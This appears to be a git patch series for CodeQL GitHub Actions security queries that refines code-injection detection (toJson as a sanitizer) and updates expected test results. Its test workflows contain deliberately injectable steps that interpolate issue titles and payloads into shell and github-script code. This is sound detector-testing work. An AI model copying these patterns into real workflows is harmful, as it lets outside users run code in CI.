semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -352,6 +365,10 @@ subpaths | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 35887c3b3707..19b72ad6b5c0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7e0146d63499a15c309d0f75da286fbbd3e9dd9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:52:01 +0200 Subject: [PATCH 373/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5518e074d30a..320ef23e413a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.10 +version: 0.1.11 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d4f97a32ec6a..e7a98574a89f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.10 +version: 0.1.11 groups: [actions, queries] suites: codeql-suites extractor: javascript From c70fb6e9114303784e8761cebfe9c7e8927ac4b2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:25:24 +0200 Subject: [PATCH 374/707] Consider toJson as a sanitizer for Code Injection in JS --- ql/lib/codeql/actions/ast/internal/Ast.qll | 30 +++++++++++++++++-- .../Security/CWE-094/CodeInjectionCritical.ql | 6 ++++ .../Security/CWE-094/CodeInjectionMedium.ql | 6 ++++ .../CWE-094/.github/workflows/test9.yml | 12 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 7 +++++ .../CWE-094/CodeInjectionMedium.expected | 4 +++ 6 files changed, 63 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index c6569367c10e..7c7c6216b1b7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1194,14 +1194,40 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + bindingset[s] string getAJsonReferenceExpression(string s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) - .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) } /** diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 7e14825a2952..3b968ceaf138 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -25,6 +25,12 @@ where inPrivilegedCompositeAction(sink.getNode().asExpr()) or inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 7599ef8847ba..abecaf997c6b 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -24,6 +24,12 @@ where ( inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 6ed7db83cb2f..47e032fd7278 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -25,3 +25,15 @@ jobs: - run: echo ${{ needs.parse-issue.outputs.payload }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ff378f93af62..7f99d7c9b835 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,3 +1,4 @@ +WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | @@ -70,6 +71,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | @@ -264,6 +266,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -369,6 +374,8 @@ subpaths | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | ${{ github.event.issue.title }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 19b72ad6b5c0..f835d492f686 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -70,6 +70,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | @@ -264,6 +265,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 69db192378e35b8ec91bbdcf7c04229129460134 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:40:48 +0200 Subject: [PATCH 375/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- .../query-tests/Security/CWE-094/.github/workflows/test9.yml | 4 ++++ .../Security/CWE-094/CodeInjectionCritical.expected | 2 +- .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 5 files changed, 8 insertions(+), 3 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 320ef23e413a..34000094dd85 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.11 +version: 0.1.12 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e7a98574a89f..5ccbc7b96578 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.11 +version: 0.1.12 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 47e032fd7278..2d60b9fe6d46 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -37,3 +37,7 @@ jobs: with: script: | core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 7f99d7c9b835..16119dd6453b 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,4 +1,3 @@ -WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | @@ -269,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f835d492f686..d0834f0dff82 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -268,6 +268,7 @@ nodes | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/test9.yml:43:42:43:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7d58beba677157cac60f19b05981da0e1f522d74 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 4 Jul 2024 13:04:59 +0200 Subject: [PATCH 376/707] Better control check support --- ql/lib/codeql/actions/Ast.qll | 10 ++- ql/lib/codeql/actions/Helper.qll | 34 ++++++-- ql/lib/codeql/actions/ast/internal/Ast.qll | 28 +++++++ .../codeql/actions/security/ControlChecks.qll | 77 +++++++++++++++++-- .../actions/security/PoisonableSteps.qll | 5 +- .../security/UntrustedCheckoutQuery.qll | 32 ++++++++ .../CWE-077/EnvPathInjectionCritical.ql | 8 +- .../CWE-077/EnvPathInjectionMedium.ql | 12 +-- .../CWE-077/EnvVarInjectionCritical.ql | 20 ++--- 